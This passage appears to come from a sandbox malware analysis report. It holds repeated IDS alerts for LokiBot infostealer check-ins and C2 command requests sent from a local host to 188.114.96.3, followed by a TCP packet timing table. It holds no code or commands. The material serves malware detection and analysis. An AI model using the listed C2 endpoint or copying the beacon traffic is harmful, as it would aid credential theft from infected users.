                                      2024-10-24T17:03:19.829825+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550023188.114.96.380TCP
                                      2024-10-24T17:03:20.770740+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550023188.114.96.380TCP
                                      2024-10-24T17:03:20.770740+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550023188.114.96.380TCP
                                      2024-10-24T17:03:20.776248+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.550023TCP
                                      2024-10-24T17:03:20.922651+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550024188.114.96.380TCP
                                      2024-10-24T17:03:20.922651+02002025381ET MALWARE LokiBot Checkin1192.168.2.550024188.114.96.380TCP
                                      2024-10-24T17:03:20.922651+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550024188.114.96.380TCP
                                      2024-10-24T17:03:21.810046+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550024188.114.96.380TCP
                                      2024-10-24T17:03:21.810046+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550024188.114.96.380TCP
                                      2024-10-24T17:03:21.815600+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.550024TCP
                                      2024-10-24T17:03:21.973153+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550025188.114.96.380TCP
                                      2024-10-24T17:03:21.973153+02002025381ET MALWARE LokiBot Checkin1192.168.2.550025188.114.96.380TCP
                                      2024-10-24T17:03:21.973153+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550025188.114.96.380TCP
                                      2024-10-24T17:03:23.173241+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550025188.114.96.380TCP
                                      2024-10-24T17:03:23.173241+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550025188.114.96.380TCP
                                      2024-10-24T17:03:23.178818+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.550025TCP
                                      2024-10-24T17:03:23.325611+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550026188.114.96.380TCP
                                      2024-10-24T17:03:23.325611+02002025381ET MALWARE LokiBot Checkin1192.168.2.550026188.114.96.380TCP
                                      2024-10-24T17:03:23.325611+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550026188.114.96.380TCP
                                      2024-10-24T17:03:24.271557+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550026188.114.96.380TCP
                                      2024-10-24T17:03:24.271557+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550026188.114.96.380TCP
                                      2024-10-24T17:03:24.277018+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.550026TCP
                                      2024-10-24T17:03:24.421552+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550027188.114.96.380TCP
                                      2024-10-24T17:03:24.421552+02002025381ET MALWARE LokiBot Checkin1192.168.2.550027188.114.96.380TCP
                                      2024-10-24T17:03:24.421552+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550027188.114.96.380TCP
                                      2024-10-24T17:03:26.405618+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550027188.114.96.380TCP
                                      2024-10-24T17:03:26.405618+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550027188.114.96.380TCP
                                      2024-10-24T17:03:26.411090+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.550027TCP
                                      2024-10-24T17:03:26.571665+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550028188.114.96.380TCP
                                      2024-10-24T17:03:26.571665+02002025381ET MALWARE LokiBot Checkin1192.168.2.550028188.114.96.380TCP
                                      2024-10-24T17:03:26.571665+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550028188.114.96.380TCP
                                      2024-10-24T17:03:29.670904+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550028188.114.96.380TCP
                                      2024-10-24T17:03:29.670904+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550028188.114.96.380TCP
                                      2024-10-24T17:03:29.677638+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.550028TCP
                                      2024-10-24T17:03:29.956285+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550029188.114.96.380TCP
                                      2024-10-24T17:03:29.956285+02002025381ET MALWARE LokiBot Checkin1192.168.2.550029188.114.96.380TCP
                                      2024-10-24T17:03:29.956285+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550029188.114.96.380TCP
                                      2024-10-24T17:03:30.974836+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550029188.114.96.380TCP
                                      2024-10-24T17:03:30.974836+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550029188.114.96.380TCP
                                      2024-10-24T17:03:30.980283+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.550029TCP
                                      2024-10-24T17:03:31.134751+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550030188.114.96.380TCP
                                      2024-10-24T17:03:31.134751+02002025381ET MALWARE LokiBot Checkin1192.168.2.550030188.114.96.380TCP
                                      2024-10-24T17:03:31.134751+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550030188.114.96.380TCP
                                      2024-10-24T17:03:32.097071+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550030188.114.96.380TCP
                                      2024-10-24T17:03:32.097071+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550030188.114.96.380TCP
                                      2024-10-24T17:03:32.103057+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.550030TCP
                                      2024-10-24T17:03:32.261893+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550031188.114.96.380TCP
                                      2024-10-24T17:03:32.261893+02002025381ET MALWARE LokiBot Checkin1192.168.2.550031188.114.96.380TCP
                                      2024-10-24T17:03:32.261893+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550031188.114.96.380TCP
                                      2024-10-24T17:03:33.257287+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550031188.114.96.380TCP
                                      2024-10-24T17:03:33.257287+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550031188.114.96.380TCP
                                      2024-10-24T17:03:33.262858+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.550031TCP
                                      2024-10-24T17:03:33.465689+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550032188.114.96.380TCP
                                      2024-10-24T17:03:33.465689+02002025381ET MALWARE LokiBot Checkin1192.168.2.550032188.114.96.380TCP
                                      2024-10-24T17:03:33.465689+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550032188.114.96.380TCP
                                      2024-10-24T17:03:34.907115+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550032188.114.96.380TCP
                                      2024-10-24T17:03:34.907115+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550032188.114.96.380TCP
                                      2024-10-24T17:03:34.913154+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.550032TCP
                                      2024-10-24T17:03:35.059300+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550033188.114.96.380TCP
                                      2024-10-24T17:03:35.059300+02002025381ET MALWARE LokiBot Checkin1192.168.2.550033188.114.96.380TCP
                                      2024-10-24T17:03:35.059300+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550033188.114.96.380TCP
                                      2024-10-24T17:03:36.731690+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550033188.114.96.380TCP
                                      2024-10-24T17:03:36.731690+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550033188.114.96.380TCP
                                      2024-10-24T17:03:36.737558+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.550033TCP
                                      2024-10-24T17:03:36.887347+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550034188.114.96.380TCP
                                      2024-10-24T17:03:36.887347+02002025381ET MALWARE LokiBot Checkin1192.168.2.550034188.114.96.380TCP
                                      2024-10-24T17:03:36.887347+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550034188.114.96.380TCP
                                      2024-10-24T17:03:38.767572+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550034188.114.96.380TCP
                                      2024-10-24T17:03:38.767572+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550034188.114.96.380TCP
                                      2024-10-24T17:03:38.773124+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.550034TCP
                                      2024-10-24T17:03:38.921832+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550035188.114.96.380TCP
                                      2024-10-24T17:03:38.921832+02002025381ET MALWARE LokiBot Checkin1192.168.2.550035188.114.96.380TCP
                                      2024-10-24T17:03:38.921832+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550035188.114.96.380TCP
                                      2024-10-24T17:03:40.378665+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550035188.114.96.380TCP
                                      2024-10-24T17:03:40.378665+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550035188.114.96.380TCP
                                      2024-10-24T17:03:40.384389+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.550035TCP
                                      2024-10-24T17:03:40.811483+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550036188.114.96.380TCP
                                      2024-10-24T17:03:40.811483+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550036188.114.96.380TCP
                                      2024-10-24T17:03:40.811483+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550036188.114.96.380TCP
                                      2024-10-24T17:03:40.811483+02002025381ET MALWARE LokiBot Checkin1192.168.2.550036188.114.96.380TCP
                                      2024-10-24T17:03:40.811483+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550036188.114.96.380TCP
                                      2024-10-24T17:03:41.729284+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.550036TCP
                                      2024-10-24T17:03:41.883240+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550037188.114.96.380TCP
                                      2024-10-24T17:03:41.883240+02002025381ET MALWARE LokiBot Checkin1192.168.2.550037188.114.96.380TCP
                                      2024-10-24T17:03:41.883240+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550037188.114.96.380TCP
                                      2024-10-24T17:03:43.222325+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550037188.114.96.380TCP
                                      2024-10-24T17:03:43.222325+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550037188.114.96.380TCP
                                      2024-10-24T17:03:43.227867+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.550037TCP
                                      2024-10-24T17:03:43.376184+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550038188.114.96.380TCP
                                      2024-10-24T17:03:43.376184+02002025381ET MALWARE LokiBot Checkin1192.168.2.550038188.114.96.380TCP
                                      2024-10-24T17:03:43.376184+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550038188.114.96.380TCP
                                      2024-10-24T17:03:44.266809+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550038188.114.96.380TCP
                                      2024-10-24T17:03:44.266809+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550038188.114.96.380TCP
                                      2024-10-24T17:03:44.272391+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.550038TCP
                                      2024-10-24T17:03:44.476668+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550039188.114.96.380TCP
                                      2024-10-24T17:03:44.476668+02002025381ET MALWARE LokiBot Checkin1192.168.2.550039188.114.96.380TCP
                                      2024-10-24T17:03:44.476668+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550039188.114.96.380TCP
                                      2024-10-24T17:03:45.899764+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550039188.114.96.380TCP
                                      2024-10-24T17:03:45.899764+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550039188.114.96.380TCP
                                      2024-10-24T17:03:45.907116+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.550039TCP
                                      2024-10-24T17:03:46.083585+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550040188.114.96.380TCP
                                      2024-10-24T17:03:46.083585+02002025381ET MALWARE LokiBot Checkin1192.168.2.550040188.114.96.380TCP
                                      2024-10-24T17:03:46.083585+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550040188.114.96.380TCP
                                      2024-10-24T17:03:49.447135+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550040188.114.96.380TCP
                                      2024-10-24T17:03:49.447135+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550040188.114.96.380TCP
                                      2024-10-24T17:03:49.452542+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.550040TCP
                                      2024-10-24T17:03:49.605447+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550041188.114.96.380TCP
                                      2024-10-24T17:03:49.605447+02002025381ET MALWARE LokiBot Checkin1192.168.2.550041188.114.96.380TCP
                                      2024-10-24T17:03:49.605447+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550041188.114.96.380TCP
                                      2024-10-24T17:03:51.258797+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550041188.114.96.380TCP
                                      2024-10-24T17:03:51.258797+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550041188.114.96.380TCP
                                      2024-10-24T17:03:51.264591+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.550041TCP
                                      2024-10-24T17:03:51.419744+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550042188.114.96.380TCP
                                      2024-10-24T17:03:51.419744+02002025381ET MALWARE LokiBot Checkin1192.168.2.550042188.114.96.380TCP
                                      2024-10-24T17:03:51.419744+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550042188.114.96.380TCP
                                      2024-10-24T17:03:52.944528+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550042188.114.96.380TCP
                                      2024-10-24T17:03:52.944528+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550042188.114.96.380TCP
                                      2024-10-24T17:03:52.950650+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.550042TCP
                                      2024-10-24T17:03:53.091767+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550043188.114.96.380TCP
                                      2024-10-24T17:03:53.091767+02002025381ET MALWARE LokiBot Checkin1192.168.2.550043188.114.96.380TCP
                                      2024-10-24T17:03:53.091767+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550043188.114.96.380TCP
                                      2024-10-24T17:03:56.758959+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550043188.114.96.380TCP
                                      2024-10-24T17:03:56.758959+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550043188.114.96.380TCP
                                      2024-10-24T17:03:56.764327+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.550043TCP
                                      2024-10-24T17:03:56.917338+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550044188.114.96.380TCP
                                      2024-10-24T17:03:56.917338+02002025381ET MALWARE LokiBot Checkin1192.168.2.550044188.114.96.380TCP
                                      2024-10-24T17:03:56.917338+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550044188.114.96.380TCP
                                      2024-10-24T17:03:58.362070+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550044188.114.96.380TCP
                                      2024-10-24T17:03:58.362070+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550044188.114.96.380TCP
                                      2024-10-24T17:03:58.367518+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.550044TCP
                                      2024-10-24T17:03:58.513507+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550045188.114.96.380TCP
                                      2024-10-24T17:03:58.513507+02002025381ET MALWARE LokiBot Checkin1192.168.2.550045188.114.96.380TCP
                                      2024-10-24T17:03:58.513507+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550045188.114.96.380TCP
                                      2024-10-24T17:04:03.635176+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550045188.114.96.380TCP
                                      2024-10-24T17:04:03.635176+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550045188.114.96.380TCP
                                      2024-10-24T17:04:03.640563+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.550045TCP
                                      2024-10-24T17:04:03.807044+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550046188.114.96.380TCP
                                      2024-10-24T17:04:03.807044+02002025381ET MALWARE LokiBot Checkin1192.168.2.550046188.114.96.380TCP
                                      2024-10-24T17:04:03.807044+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550046188.114.96.380TCP
                                      2024-10-24T17:04:04.695816+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550046188.114.96.380TCP
                                      2024-10-24T17:04:04.695816+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550046188.114.96.380TCP
                                      2024-10-24T17:04:04.701192+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.550046TCP
                                      2024-10-24T17:04:04.868950+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550047188.114.96.380TCP
                                      2024-10-24T17:04:04.868950+02002025381ET MALWARE LokiBot Checkin1192.168.2.550047188.114.96.380TCP
                                      2024-10-24T17:04:04.868950+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550047188.114.96.380TCP
                                      2024-10-24T17:04:06.227709+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550047188.114.96.380TCP
                                      2024-10-24T17:04:06.227709+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550047188.114.96.380TCP
                                      2024-10-24T17:04:06.233149+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.550047TCP
                                      2024-10-24T17:04:06.395715+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550048188.114.96.380TCP
                                      2024-10-24T17:04:06.395715+02002025381ET MALWARE LokiBot Checkin1192.168.2.550048188.114.96.380TCP
                                      2024-10-24T17:04:06.395715+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550048188.114.96.380TCP
                                      2024-10-24T17:04:07.732122+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550048188.114.96.380TCP
                                      2024-10-24T17:04:07.732122+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550048188.114.96.380TCP
                                      2024-10-24T17:04:07.737626+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.550048TCP
                                      TimestampSource PortDest PortSource IPDest IP
                                      Oct 24, 2024 17:02:06.720123053 CEST4970480192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:06.725739002 CEST8049704188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:06.725816965 CEST4970480192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:06.727760077 CEST4970480192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:06.733154058 CEST8049704188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:06.733299017 CEST4970480192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:06.738603115 CEST8049704188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:07.685256958 CEST8049704188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:07.687397003 CEST8049704188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:07.687490940 CEST4970480192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:07.691330910 CEST4970480192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:07.696830988 CEST8049704188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:07.817150116 CEST4970580192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:07.822803974 CEST8049705188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:07.822948933 CEST4970580192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:07.824615955 CEST4970580192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:07.830476046 CEST8049705188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:07.830535889 CEST4970580192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:07.835902929 CEST8049705188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:08.867274046 CEST8049705188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:08.867341042 CEST8049705188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:08.867502928 CEST4970580192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:08.867502928 CEST4970580192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:08.874255896 CEST8049705188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:08.918083906 CEST4970680192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:08.926387072 CEST8049706188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:08.926563025 CEST4970680192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:08.928268909 CEST4970680192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:08.934016943 CEST8049706188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:08.934077978 CEST4970680192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:08.939547062 CEST8049706188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:10.024525881 CEST8049706188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:10.024579048 CEST8049706188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:10.024593115 CEST8049706188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:10.024740934 CEST4970680192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:10.024938107 CEST4970680192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:10.030313969 CEST8049706188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:10.170767069 CEST4970780192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:10.177937984 CEST8049707188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:10.178014040 CEST4970780192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:10.179774046 CEST4970780192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:10.185267925 CEST8049707188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:10.185322046 CEST4970780192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:10.192128897 CEST8049707188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:11.080620050 CEST8049707188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:11.080801964 CEST4970780192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:11.083781004 CEST8049707188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:11.083854914 CEST4970780192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:11.088433981 CEST8049707188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:11.221721888 CEST4970880192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:11.228126049 CEST8049708188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:11.228306055 CEST4970880192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:11.230082989 CEST4970880192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:11.235469103 CEST8049708188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:11.235526085 CEST4970880192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:11.241044998 CEST8049708188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:12.208580017 CEST8049708188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:12.208821058 CEST4970880192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:12.210768938 CEST8049708188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:12.210824966 CEST4970880192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:12.214200974 CEST8049708188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:12.347282887 CEST4970980192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:12.353233099 CEST8049709188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:12.353338003 CEST4970980192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:12.355288982 CEST4970980192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:12.361027002 CEST8049709188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:12.361135006 CEST4970980192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:12.366481066 CEST8049709188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:13.386910915 CEST8049709188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:13.387417078 CEST4970980192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:13.390038013 CEST8049709188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:13.390108109 CEST4970980192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:13.394165993 CEST8049709188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:13.536159992 CEST4971080192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:13.541912079 CEST8049710188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:13.541982889 CEST4971080192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:13.543705940 CEST4971080192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:13.549267054 CEST8049710188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:13.549320936 CEST4971080192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:13.554828882 CEST8049710188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:16.922208071 CEST8049710188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:16.923353910 CEST4971080192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:16.924885988 CEST8049710188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:16.924936056 CEST4971080192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:16.928848028 CEST8049710188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:17.062760115 CEST4971780192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:17.070650101 CEST8049717188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:17.070736885 CEST4971780192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:17.072479010 CEST4971780192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:17.079283953 CEST8049717188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:17.079418898 CEST4971780192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:17.085381985 CEST8049717188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:20.447261095 CEST8049717188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:20.447397947 CEST4971780192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:20.448201895 CEST8049717188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:20.448267937 CEST4971780192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:20.453089952 CEST8049717188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:20.593838930 CEST4973580192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:20.600764036 CEST8049735188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:20.600860119 CEST4973580192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:20.602596998 CEST4973580192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:20.619389057 CEST8049735188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:20.619456053 CEST4973580192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:20.630954027 CEST8049735188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:21.532000065 CEST8049735188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:21.532098055 CEST4973580192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:21.534432888 CEST8049735188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:21.534492016 CEST4973580192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:21.539726973 CEST8049735188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:21.678251028 CEST4974580192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:21.683748007 CEST8049745188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:21.683828115 CEST4974580192.168.2.5188.114.96.3
